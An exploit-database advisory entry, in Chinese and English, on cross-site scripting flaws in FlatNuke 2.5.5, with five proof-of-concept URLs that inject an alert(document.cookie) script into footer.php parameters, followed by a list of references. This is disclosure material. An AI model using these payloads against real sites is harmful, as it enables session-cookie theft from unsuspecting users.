https://www.exploit-db.com/exploits/26099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-092

FlatNuke2.5.5及其它可能早期版本中存在多个跨站脚本(XSS)漏洞。这使得远程攻击者可以借助于(1)bodycolor、(2)backimage、(3)theme、(4)structure.php的logo参数、(5)admin、(6)admin_mail、(7)footer.php的back参数或(8)新闻贴中的消息体，注入任意的Web脚本或HTML。

source: http://www.securityfocus.com/bid/14483/info
 
FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
 
An attacker can exploit these vulnerabilities to inject html and script code into the Web browser of an unsuspecting victim.The attacker may then steal cookie-based authentication credentials. Other attacks are also possible. 

http://[target]/[path]/forum/footer.php?admin="><script>alert(document.cookie)</script>
http://[target]/[path]/forum/footer.php?admin_mail="><script>alert(document.cookie)</script>
http://[target]/[path]/forum/footer.php?back="><script>alert(document.cookie)</script>
http://[target]/[path]/footer.php?admin="><script>alert(document.cookie)</script>
http://[target]/[path]/footer.php?admin_mail="><script>alert(document.cookie)</script>

来源:MISC
链接:http://www.rgod.altervista.org/flatnuke.html
来源:BUGTRAQ
名称:20050804FlatNuke2.5.5(possiblypriorversions)remotecommands
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112327238030127&w;=2
来源:XF
名称:flatnuke-news-articles-xss(21708)
链接:http://xforce.iss.net/xforce/xfdb/21708
来源:XF
名称:flatnuke-structure-xss(21707)
链接:http://xforce.iss.net/xforce/xfdb/21707
来源:BID
名称:14483
链接:http://www.securityfocus.com/bid/14483
来源:OSVDB
名称:18553
链接:http://www.osvdb.org/18553
来源:OSVDB
名称:18552
链接:http://www.osvdb.org/18552
来源:OSVDB
名称:18551
链接:http://www.osvdb.org/18551
来源:SECUNIA
名称:16330
链接:http://secunia.com/advisories/16330